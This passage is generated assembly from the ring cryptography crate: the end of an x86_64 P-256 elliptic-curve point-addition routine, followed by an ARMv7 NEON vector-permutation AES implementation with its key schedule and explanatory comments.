por %xmm3,%xmm4
pxor %xmm3,%xmm3
movq %r14,%r11
pcmpeqd %xmm3,%xmm4
pshufd $0,%xmm4,%xmm4
leaq 32-128(%rsp),%rsi
movq %r15,%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 320(%rsp),%rbx
leaq 64(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 384(%rsp),%rdx
leaq 384(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 288(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 448(%rsp),%rdx
leaq 448(%rsp),%rbx
movq 0+32(%rsp),%r9
movq 8+32(%rsp),%r10
leaq -128+32(%rsp),%rsi
movq 16+32(%rsp),%r11
movq 24+32(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 352(%rsp),%rbx
leaq 96(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+64(%rsp),%rdx
movq 8+64(%rsp),%r14
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r15
movq 24+64(%rsp),%r8
leaq 128(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 0+96(%rsp),%rdx
movq 8+96(%rsp),%r14
leaq -128+96(%rsp),%rsi
movq 16+96(%rsp),%r15
movq 24+96(%rsp),%r8
leaq 192(%rsp),%rdi
call __ecp_nistz256_sqr_montx
movq 128(%rsp),%rdx
leaq 128(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 160(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 320(%rsp),%rdx
leaq 320(%rsp),%rbx
movq 0+128(%rsp),%r9
movq 8+128(%rsp),%r10
leaq -128+128(%rsp),%rsi
movq 16+128(%rsp),%r11
movq 24+128(%rsp),%r12
leaq 0(%rsp),%rdi
call __ecp_nistz256_mul_montx
xorq %r11,%r11
addq %r12,%r12
leaq 192(%rsp),%rsi
adcq %r13,%r13
movq %r12,%rax
adcq %r8,%r8
adcq %r9,%r9
movq %r13,%rbp
adcq $0,%r11
subq $-1,%r12
movq %r8,%rcx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%r10
sbbq %r15,%r9
sbbq $0,%r11
cmovcq %rax,%r12
movq 0(%rsi),%rax
cmovcq %rbp,%r13
movq 8(%rsi),%rbp
cmovcq %rcx,%r8
movq 16(%rsi),%rcx
cmovcq %r10,%r9
movq 24(%rsi),%r10
call __ecp_nistz256_subx
leaq 160(%rsp),%rbx
leaq 224(%rsp),%rdi
call __ecp_nistz256_sub_fromx
movq 0+0(%rsp),%rax
movq 0+8(%rsp),%rbp
movq 0+16(%rsp),%rcx
movq 0+24(%rsp),%r10
leaq 64(%rsp),%rdi
call __ecp_nistz256_subx
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 352(%rsp),%rdx
leaq 352(%rsp),%rbx
movq 0+160(%rsp),%r9
movq 8+160(%rsp),%r10
leaq -128+160(%rsp),%rsi
movq 16+160(%rsp),%r11
movq 24+160(%rsp),%r12
leaq 32(%rsp),%rdi
call __ecp_nistz256_mul_montx
movq 96(%rsp),%rdx
leaq 96(%rsp),%rbx
movq 0+64(%rsp),%r9
movq 8+64(%rsp),%r10
leaq -128+64(%rsp),%rsi
movq 16+64(%rsp),%r11
movq 24+64(%rsp),%r12
leaq 64(%rsp),%rdi
call __ecp_nistz256_mul_montx
leaq 32(%rsp),%rbx
leaq 256(%rsp),%rdi
call __ecp_nistz256_sub_fromx
.byte 102,72,15,126,199
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 288(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 288+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand L$ONE_mont(%rip),%xmm2
pand L$ONE_mont+16(%rip),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 384(%rsp),%xmm2
pand 384+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,64(%rdi)
movdqu %xmm3,80(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 224(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 224+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 416(%rsp),%xmm2
pand 416+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 320(%rsp),%xmm2
pand 320+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,0(%rdi)
movdqu %xmm3,16(%rdi)
movdqa %xmm5,%xmm0
movdqa %xmm5,%xmm1
pandn 256(%rsp),%xmm0
movdqa %xmm5,%xmm2
pandn 256+16(%rsp),%xmm1
movdqa %xmm5,%xmm3
pand 448(%rsp),%xmm2
pand 448+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqa %xmm4,%xmm0
movdqa %xmm4,%xmm1
pandn %xmm2,%xmm0
movdqa %xmm4,%xmm2
pandn %xmm3,%xmm1
movdqa %xmm4,%xmm3
pand 352(%rsp),%xmm2
pand 352+16(%rsp),%xmm3
por %xmm0,%xmm2
por %xmm1,%xmm3
movdqu %xmm2,32(%rdi)
movdqu %xmm3,48(%rdi)
leaq 480+56(%rsp),%rsi
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbx
movq -8(%rsi),%rbp
leaq (%rsi),%rsp
L$add_affinex_epilogue:
ret
#endif
|
mi2bjss/Pressel-site | 23,124 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-armv7-linux32.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
.syntax unified
.arch armv7-a
.fpu neon
#if defined(__thumb2__)
.thumb
#else
.code 32
#endif
.text
.type _vpaes_consts,%object
.align 7 @ totally strategic alignment
_vpaes_consts:
.Lk_mc_forward:@ mc_forward
.quad 0x0407060500030201, 0x0C0F0E0D080B0A09
.quad 0x080B0A0904070605, 0x000302010C0F0E0D
.quad 0x0C0F0E0D080B0A09, 0x0407060500030201
.quad 0x000302010C0F0E0D, 0x080B0A0904070605
.Lk_mc_backward:@ mc_backward
.quad 0x0605040702010003, 0x0E0D0C0F0A09080B
.quad 0x020100030E0D0C0F, 0x0A09080B06050407
.quad 0x0E0D0C0F0A09080B, 0x0605040702010003
.quad 0x0A09080B06050407, 0x020100030E0D0C0F
.Lk_sr:@ sr
.quad 0x0706050403020100, 0x0F0E0D0C0B0A0908
.quad 0x030E09040F0A0500, 0x0B06010C07020D08
.quad 0x0F060D040B020900, 0x070E050C030A0108
.quad 0x0B0E0104070A0D00, 0x0306090C0F020508
@
@ "Hot" constants
@
.Lk_inv:@ inv, inva
.quad 0x0E05060F0D080180, 0x040703090A0B0C02
.quad 0x01040A060F0B0780, 0x030D0E0C02050809
.Lk_ipt:@ input transform (lo, hi)
.quad 0xC2B2E8985A2A7000, 0xCABAE09052227808
.quad 0x4C01307D317C4D00, 0xCD80B1FCB0FDCC81
.Lk_sbo:@ sbou, sbot
.quad 0xD0D26D176FBDC700, 0x15AABF7AC502A878
.quad 0xCFE474A55FBB6A00, 0x8E1E90D1412B35FA
.Lk_sb1:@ sb1u, sb1t
.quad 0x3618D415FAE22300, 0x3BF7CCC10D2ED9EF
.quad 0xB19BE18FCB503E00, 0xA5DF7A6E142AF544
.Lk_sb2:@ sb2u, sb2t
.quad 0x69EB88400AE12900, 0xC2A163C8AB82234A
.quad 0xE27A93C60B712400, 0x5EB7E955BC982FCD
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105,111,110,32,65,69,83,32,102,111,114,32,65,82,77,118,55,32,78,69,79,78,44,32,77,105,107,101,32,72,97,109,98,117,114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105,118,101,114,115,105,116,121,41,0
.align 2
.size _vpaes_consts,.-_vpaes_consts
.align 6
@@
@@ _aes_preheat
@@
@@ Fills q9-q15 as specified below.
@@
.type _vpaes_preheat,%function
.align 4
_vpaes_preheat:
adr r10, .Lk_inv
vmov.i8 q9, #0x0f @ .Lk_s0F
vld1.64 {q10,q11}, [r10]! @ .Lk_inv
add r10, r10, #64 @ Skip .Lk_ipt, .Lk_sbo
vld1.64 {q12,q13}, [r10]! @ .Lk_sb1
vld1.64 {q14,q15}, [r10] @ .Lk_sb2
bx lr
@@
@@ _aes_encrypt_core
@@
@@ AES-encrypt q0.
@@
@@ Inputs:
@@ q0 = input
@@ q9-q15 as in _vpaes_preheat
@@ [r2] = scheduled keys
@@
@@ Output in q0
@@ Clobbers q1-q5, r8-r11
@@ Preserves q6-q8 so you get some local vectors
@@
@@
.type _vpaes_encrypt_core,%function
.align 4
_vpaes_encrypt_core:
mov r9, r2
ldr r8, [r2,#240] @ pull rounds
adr r11, .Lk_ipt
@ vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
@ vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
vld1.64 {q2, q3}, [r11]
adr r11, .Lk_mc_forward+16
vld1.64 {q5}, [r9]! @ vmovdqu (%r9), %xmm5 # round0 key
vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0
vtbl.8 d2, {q2}, d2 @ vpshufb %xmm1, %xmm2, %xmm1
vtbl.8 d3, {q2}, d3
vtbl.8 d4, {q3}, d0 @ vpshufb %xmm0, %xmm3, %xmm2
vtbl.8 d5, {q3}, d1
veor q0, q1, q5 @ vpxor %xmm5, %xmm1, %xmm0
veor q0, q0, q2 @ vpxor %xmm2, %xmm0, %xmm0
@ .Lenc_entry ends with a bnz instruction which is normally paired with
@ subs in .Lenc_loop.
tst r8, r8
b .Lenc_entry
.align 4
.Lenc_loop:
@ middle of middle round
add r10, r11, #0x40
vtbl.8 d8, {q13}, d4 @ vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
vtbl.8 d9, {q13}, d5
vld1.64 {q1}, [r11]! @ vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
vtbl.8 d0, {q12}, d6 @ vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
vtbl.8 d1, {q12}, d7
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
vtbl.8 d10, {q15}, d4 @ vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
vtbl.8 d11, {q15}, d5
veor q0, q0, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = A
vtbl.8 d4, {q14}, d6 @ vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
vtbl.8 d5, {q14}, d7
vld1.64 {q4}, [r10] @ vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
vtbl.8 d6, {q0}, d2 @ vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
vtbl.8 d7, {q0}, d3
veor q2, q2, q5 @ vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
@ Write to q5 instead of q0, so the table and destination registers do
@ not overlap.
vtbl.8 d10, {q0}, d8 @ vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
vtbl.8 d11, {q0}, d9
veor q3, q3, q2 @ vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
vtbl.8 d8, {q3}, d2 @ vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
vtbl.8 d9, {q3}, d3
@ Here we restore the original q0/q5 usage.
veor q0, q5, q3 @ vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
and r11, r11, #~(1<<6) @ and $0x30, %r11 # ... mod 4
veor q0, q0, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
subs r8, r8, #1 @ nr--
.Lenc_entry:
@ top of round
vand q1, q0, q9 @ vpand %xmm0, %xmm9, %xmm1 # 0 = k
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0 # 1 = i
vtbl.8 d10, {q11}, d2 @ vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
vtbl.8 d11, {q11}, d3
veor q1, q1, q0 @ vpxor %xmm0, %xmm1, %xmm1 # 0 = j
vtbl.8 d6, {q10}, d0 @ vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
vtbl.8 d7, {q10}, d1
vtbl.8 d8, {q10}, d2 @ vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
vtbl.8 d9, {q10}, d3
veor q3, q3, q5 @ vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
vtbl.8 d4, {q10}, d6 @ vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
vtbl.8 d5, {q10}, d7
vtbl.8 d6, {q10}, d8 @ vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
vtbl.8 d7, {q10}, d9
veor q2, q2, q1 @ vpxor %xmm1, %xmm2, %xmm2 # 2 = io
veor q3, q3, q0 @ vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
vld1.64 {q5}, [r9]! @ vmovdqu (%r9), %xmm5
bne .Lenc_loop
@ middle of last round
add r10, r11, #0x80
adr r11, .Lk_sbo
@ Read to q1 instead of q4, so the vtbl.8 instruction below does not
@ overlap table and destination registers.
vld1.64 {q1}, [r11]! @ vmovdqa -0x60(%r10), %xmm4 # 3 : sbou
vld1.64 {q0}, [r11] @ vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
vtbl.8 d8, {q1}, d4 @ vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
vtbl.8 d9, {q1}, d5
vld1.64 {q1}, [r10] @ vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
@ Write to q2 instead of q0 below, to avoid overlapping table and
@ destination registers.
vtbl.8 d4, {q0}, d6 @ vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
vtbl.8 d5, {q0}, d7
veor q4, q4, q5 @ vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
veor q2, q2, q4 @ vpxor %xmm4, %xmm0, %xmm0 # 0 = A
@ Here we restore the original q0/q2 usage.
vtbl.8 d0, {q2}, d2 @ vpshufb %xmm1, %xmm0, %xmm0
vtbl.8 d1, {q2}, d3
bx lr
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ @@
@@ AES key schedule @@
@@ @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This function diverges from both x86_64 and armv7 in which constants are
@ pinned. x86_64 has a common preheat function for all operations. aarch64
@ separates them because it has enough registers to pin nearly all constants.
@ armv7 does not have enough registers, but needing explicit loads and stores
@ also complicates using x86_64's register allocation directly.
@
@ We pin some constants for convenience and leave q14 and q15 free to load
@ others on demand.
@
@ Key schedule constants
@
.type _vpaes_key_consts,%object
.align 4
_vpaes_key_consts:
.Lk_rcon:@ rcon
.quad 0x1F8391B9AF9DEEB6, 0x702A98084D7C7D81
.Lk_opt:@ output transform
.quad 0xFF9F4929D6B66000, 0xF7974121DEBE6808
.quad 0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0
.Lk_deskew:@ deskew tables: inverts the sbox's "skew"
.quad 0x07E4A34047A4E300, 0x1DFEB95A5DBEF91A
.quad 0x5F36B5DC83EA6900, 0x2841C2ABF49D1E77
.size _vpaes_key_consts,.-_vpaes_key_consts
.type _vpaes_key_preheat,%function
.align 4
_vpaes_key_preheat:
adr r11, .Lk_rcon
vmov.i8 q12, #0x5b @ .Lk_s63
adr r10, .Lk_inv @ Must be aligned to 8 mod 16.
vmov.i8 q9, #0x0f @ .Lk_s0F
vld1.64 {q10,q11}, [r10] @ .Lk_inv
vld1.64 {q8}, [r11] @ .Lk_rcon
bx lr
.size _vpaes_key_preheat,.-_vpaes_key_preheat
.type _vpaes_schedule_core,%function
.align 4
_vpaes_schedule_core:
@ We only need to save lr, but ARM requires an 8-byte stack alignment,
@ so save an extra register.
stmdb sp!, {r3,lr}
bl _vpaes_key_preheat @ load the tables
adr r11, .Lk_ipt @ Must be aligned to 8 mod 16.
vld1.64 {q0}, [r0]! @ vmovdqu (%rdi), %xmm0 # load key (unaligned)
@ input transform
@ Use q4 here rather than q3 so .Lschedule_am_decrypting does not
@ overlap table and destination.
vmov q4, q0 @ vmovdqa %xmm0, %xmm3
bl _vpaes_schedule_transform
adr r10, .Lk_sr @ Must be aligned to 8 mod 16.
vmov q7, q0 @ vmovdqa %xmm0, %xmm7
add r8, r8, r10
@ encrypting, output zeroth round key after transform
vst1.64 {q0}, [r2] @ vmovdqu %xmm0, (%rdx)
@ *ring*: Decryption removed.
.Lschedule_go:
cmp r1, #192 @ cmp $192, %esi
bhi .Lschedule_256
@ 128: fall though
@@
@@ .schedule_128
@@
@@ 128-bit specific part of key schedule.
@@
@@ This schedule is really simple, because all its parts
@@ are accomplished by the subroutines.
@@
.Lschedule_128:
mov r0, #10 @ mov $10, %esi
.Loop_schedule_128:
bl _vpaes_schedule_round
subs r0, r0, #1 @ dec %esi
beq .Lschedule_mangle_last
bl _vpaes_schedule_mangle @ write output
b .Loop_schedule_128
@@
@@ .aes_schedule_256
@@
@@ 256-bit specific part of key schedule.
@@
@@ The structure here is very similar to the 128-bit
@@ schedule, but with an additional "low side" in
@@ q6. The low side's rounds are the same as the
@@ high side's, except no rcon and no rotation.
@@
.align 4
.Lschedule_256:
vld1.64 {q0}, [r0] @ vmovdqu 16(%rdi),%xmm0 # load key part 2 (unaligned)
bl _vpaes_schedule_transform @ input transform
mov r0, #7 @ mov $7, %esi
.Loop_schedule_256:
bl _vpaes_schedule_mangle @ output low result
vmov q6, q0 @ vmovdqa %xmm0, %xmm6 # save cur_lo in xmm6
@ high round
bl _vpaes_schedule_round
subs r0, r0, #1 @ dec %esi
beq .Lschedule_mangle_last
bl _vpaes_schedule_mangle
@ low round. swap xmm7 and xmm6
vdup.32 q0, d1[1] @ vpshufd $0xFF, %xmm0, %xmm0
vmov.i8 q4, #0
vmov q5, q7 @ vmovdqa %xmm7, %xmm5
vmov q7, q6 @ vmovdqa %xmm6, %xmm7
bl _vpaes_schedule_low_round
vmov q7, q5 @ vmovdqa %xmm5, %xmm7
b .Loop_schedule_256
@@
@@ .aes_schedule_mangle_last
@@
@@ Mangler for last round of key schedule
@@ Mangles q0
@@ when encrypting, outputs out(q0) ^ 63
@@ when decrypting, outputs unskew(q0)
@@
@@ Always called right before return... jumps to cleanup and exits
@@
.align 4
.Lschedule_mangle_last:
@ schedule last round key from xmm0
adr r11, .Lk_deskew @ lea .Lk_deskew(%rip),%r11 # prepare to deskew
@ encrypting
vld1.64 {q1}, [r8] @ vmovdqa (%r8,%r10),%xmm1
adr r11, .Lk_opt @ lea .Lk_opt(%rip), %r11 # prepare to output transform
add r2, r2, #32 @ add $32, %rdx
vmov q2, q0
vtbl.8 d0, {q2}, d2 @ vpshufb %xmm1, %xmm0, %xmm0 # output permute
vtbl.8 d1, {q2}, d3
.Lschedule_mangle_last_dec:
sub r2, r2, #16 @ add $-16, %rdx
veor q0, q0, q12 @ vpxor .Lk_s63(%rip), %xmm0, %xmm0
bl _vpaes_schedule_transform @ output transform
vst1.64 {q0}, [r2] @ vmovdqu %xmm0, (%rdx) # save last key
@ cleanup
veor q0, q0, q0 @ vpxor %xmm0, %xmm0, %xmm0
veor q1, q1, q1 @ vpxor %xmm1, %xmm1, %xmm1
veor q2, q2, q2 @ vpxor %xmm2, %xmm2, %xmm2
veor q3, q3, q3 @ vpxor %xmm3, %xmm3, %xmm3
veor q4, q4, q4 @ vpxor %xmm4, %xmm4, %xmm4
veor q5, q5, q5 @ vpxor %xmm5, %xmm5, %xmm5
veor q6, q6, q6 @ vpxor %xmm6, %xmm6, %xmm6
veor q7, q7, q7 @ vpxor %xmm7, %xmm7, %xmm7
ldmia sp!, {r3,pc} @ return
.size _vpaes_schedule_core,.-_vpaes_schedule_core
@@
@@ .aes_schedule_round
@@
@@ Runs one main round of the key schedule on q0, q7
@@
@@ Specifically, runs subbytes on the high dword of q0
@@ then rotates it by one byte and xors into the low dword of
@@ q7.
@@
@@ Adds rcon from low byte of q8, then rotates q8 for
@@ next rcon.
@@
@@ Smears the dwords of q7 by xoring the low into the
@@ second low, result into third, result into highest.
@@
@@ Returns results in q7 = q0.
@@ Clobbers q1-q4, r11.
@@
.type _vpaes_schedule_round,%function
.align 4
_vpaes_schedule_round:
@ extract rcon from xmm8
vmov.i8 q4, #0 @ vpxor %xmm4, %xmm4, %xmm4
vext.8 q1, q8, q4, #15 @ vpalignr $15, %xmm8, %xmm4, %xmm1
vext.8 q8, q8, q8, #15 @ vpalignr $15, %xmm8, %xmm8, %xmm8
veor q7, q7, q1 @ vpxor %xmm1, %xmm7, %xmm7
@ rotate
vdup.32 q0, d1[1] @ vpshufd $0xFF, %xmm0, %xmm0
vext.8 q0, q0, q0, #1 @ vpalignr $1, %xmm0, %xmm0, %xmm0
@ fall through...
@ low round: same as high round, but no rotation and no rcon.
_vpaes_schedule_low_round:
@ The x86_64 version pins .Lk_sb1 in %xmm13 and .Lk_sb1+16 in %xmm12.
@ We pin other values in _vpaes_key_preheat, so load them now.
adr r11, .Lk_sb1
vld1.64 {q14,q15}, [r11]
@ smear xmm7
vext.8 q1, q4, q7, #12 @ vpslldq $4, %xmm7, %xmm1
veor q7, q7, q1 @ vpxor %xmm1, %xmm7, %xmm7
vext.8 q4, q4, q7, #8 @ vpslldq $8, %xmm7, %xmm4
@ subbytes
vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1 # 0 = k
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0 # 1 = i
veor q7, q7, q4 @ vpxor %xmm4, %xmm7, %xmm7
vtbl.8 d4, {q11}, d2 @ vpshufb %xmm1, %xmm11, %xmm2 # 2 = a/k
vtbl.8 d5, {q11}, d3
veor q1, q1, q0 @ vpxor %xmm0, %xmm1, %xmm1 # 0 = j
vtbl.8 d6, {q10}, d0 @ vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
vtbl.8 d7, {q10}, d1
veor q3, q3, q2 @ vpxor %xmm2, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
vtbl.8 d8, {q10}, d2 @ vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
vtbl.8 d9, {q10}, d3
veor q7, q7, q12 @ vpxor .Lk_s63(%rip), %xmm7, %xmm7
vtbl.8 d6, {q10}, d6 @ vpshufb %xmm3, %xmm10, %xmm3 # 2 = 1/iak
vtbl.8 d7, {q10}, d7
veor q4, q4, q2 @ vpxor %xmm2, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
vtbl.8 d4, {q10}, d8 @ vpshufb %xmm4, %xmm10, %xmm2 # 3 = 1/jak
vtbl.8 d5, {q10}, d9
veor q3, q3, q1 @ vpxor %xmm1, %xmm3, %xmm3 # 2 = io
veor q2, q2, q0 @ vpxor %xmm0, %xmm2, %xmm2 # 3 = jo
vtbl.8 d8, {q15}, d6 @ vpshufb %xmm3, %xmm13, %xmm4 # 4 = sbou
vtbl.8 d9, {q15}, d7
vtbl.8 d2, {q14}, d4 @ vpshufb %xmm2, %xmm12, %xmm1 # 0 = sb1t
vtbl.8 d3, {q14}, d5
veor q1, q1, q4 @ vpxor %xmm4, %xmm1, %xmm1 # 0 = sbox output
@ add in smeared stuff
veor q0, q1, q7 @ vpxor %xmm7, %xmm1, %xmm0
veor q7, q1, q7 @ vmovdqa %xmm0, %xmm7
bx lr
.size _vpaes_schedule_round,.-_vpaes_schedule_round
@@
@@ .aes_schedule_transform
@@
@@ Linear-transform q0 according to tables at [r11]
@@
@@ Requires that q9 = 0x0F0F... as in preheat
@@ Output in q0
@@ Clobbers q1, q2, q14, q15
@@
.type _vpaes_schedule_transform,%function
.align 4
_vpaes_schedule_transform:
vld1.64 {q14,q15}, [r11] @ vmovdqa (%r11), %xmm2 # lo
@ vmovdqa 16(%r11), %xmm1 # hi
vand q1, q0, q9 @ vpand %xmm9, %xmm0, %xmm1
vshr.u8 q0, q0, #4 @ vpsrlb $4, %xmm0, %xmm0
vtbl.8 d4, {q14}, d2 @ vpshufb %xmm1, %xmm2, %xmm2
vtbl.8 d5, {q14}, d3
vtbl.8 d0, {q15}, d0 @ vpshufb %xmm0, %xmm1, %xmm0
vtbl.8 d1, {q15}, d1
veor q0, q0, q2 @ vpxor %xmm2, %xmm0, %xmm0
bx lr
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
@@
@@ .aes_schedule_mangle
@@
@@ Mangles q0 from (basis-transformed) standard version
@@ to our version.
@@
@@ On encrypt,
@@ xor with 0x63
@@ multiply by circulant 0,1,1,1
@@ apply shiftrows transform
@@
@@ On decrypt,
@@ xor with 0x63
@@ multiply by "inverse mixcolumns" circulant E,B,D,9
@@ deskew
@@ apply shiftrows transform
@@
@@
@@ Writes out to [r2], and increments or decrements it
@@ Keeps track of round number mod 4 in r8
@@ Preserves q0
@@ Clobbers q1-q5
@@
.type _vpaes_schedule_mangle,%function
.align 4
_vpaes_schedule_mangle:
tst r3, r3
vmov q4, q0 @ vmovdqa %xmm0, %xmm4 # save xmm0 for later
adr r11, .Lk_mc_forward @ Must be aligned to 8 mod 16.
vld1.64 {q5}, [r11] @ vmovdqa .Lk_mc_forward(%rip),%xmm5
@ encrypting
@ Write to q2 so we do not overlap table and destination below.
veor q2, q0, q12 @ vpxor .Lk_s63(%rip), %xmm0, %xmm4
add r2, r2, #16 @ add $16, %rdx
vtbl.8 d8, {q2}, d10 @ vpshufb %xmm5, %xmm4, %xmm4
vtbl.8 d9, {q2}, d11
vtbl.8 d2, {q4}, d10 @ vpshufb %xmm5, %xmm4, %xmm1
vtbl.8 d3, {q4}, d11
vtbl.8 d6, {q1}, d10 @ vpshufb %xmm5, %xmm1, %xmm3
vtbl.8 d7, {q1}, d11
veor q4, q4, q1 @ vpxor %xmm1, %xmm4, %xmm4
vld1.64 {q1}, [r8] @ vmovdqa (%r8,%r10), %xmm1
veor q3, q3, q4 @ vpxor %xmm4, %xmm3, %xmm3
.Lschedule_mangle_both:
@ Write to q2 so table and destination do not overlap.
vtbl.8 d4, {q3}, d2 @ vpshufb %xmm1, %xmm3, %xmm3
vtbl.8 d5, {q3}, d3
add r8, r8, #64-16 @ add $-16, %r8
and r8, r8, #~(1<<6) @ and $0x30, %r8
vst1.64 {q2}, [r2] @ vmovdqu %xmm3, (%rdx)
bx lr
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,%function
.align 4
vpaes_set_encrypt_key:
stmdb sp!, {r7,r8,r9,r10,r11, lr}
vstmdb sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
lsr r9, r1, #5 @ shr $5,%eax
add r9, r9, #5 @ $5,%eax
str r9, [r2,#240] @ mov %eax,240(%rdx) # AES_KEY->rounds = nbits/32+5;
mov r3, #0 @ mov $0,%ecx
mov r8, #0x30 @ mov $0x30,%r8d
bl _vpaes_schedule_core
eor r0, r0, r0
vldmia sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!, {r7,r8,r9,r10,r11, pc} @ return
.size vpaes_set_encrypt_key,.-vpaes_set_encrypt_key
@ Additional constants for converting to bsaes.
.type _vpaes_convert_consts,%object
.align 4
_vpaes_convert_consts:
@ .Lk_opt_then_skew applies skew(opt(x)) XOR 0x63, where skew is the linear
@ transform in the AES S-box. 0x63 is incorporated into the low half of the
@ table. This was computed with the following script:
@
@ def u64s_to_u128(x, y):
@ return x | (y << 64)
@ def u128_to_u64s(w):
@ return w & ((1<<64)-1), w >> 64
@ def get_byte(w, i):
@ return (w >> (i*8)) & 0xff
@ def apply_table(table, b):
@ lo = b & 0xf
@ hi = b >> 4
@ return get_byte(table[0], lo) ^ get_byte(table[1], hi)
@ def opt(b):
@ table = [
@ u64s_to_u128(0xFF9F4929D6B66000, 0xF7974121DEBE6808),
@ u64s_to_u128(0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0),
@ ]
@ return apply_table(table, b)
@ def rot_byte(b, n):
@ return 0xff & ((b << n) | (b >> (8-n)))
@ def skew(x):
@ return (x ^ rot_byte(x, 1) ^ rot_byte(x, 2) ^ rot_byte(x, 3) ^
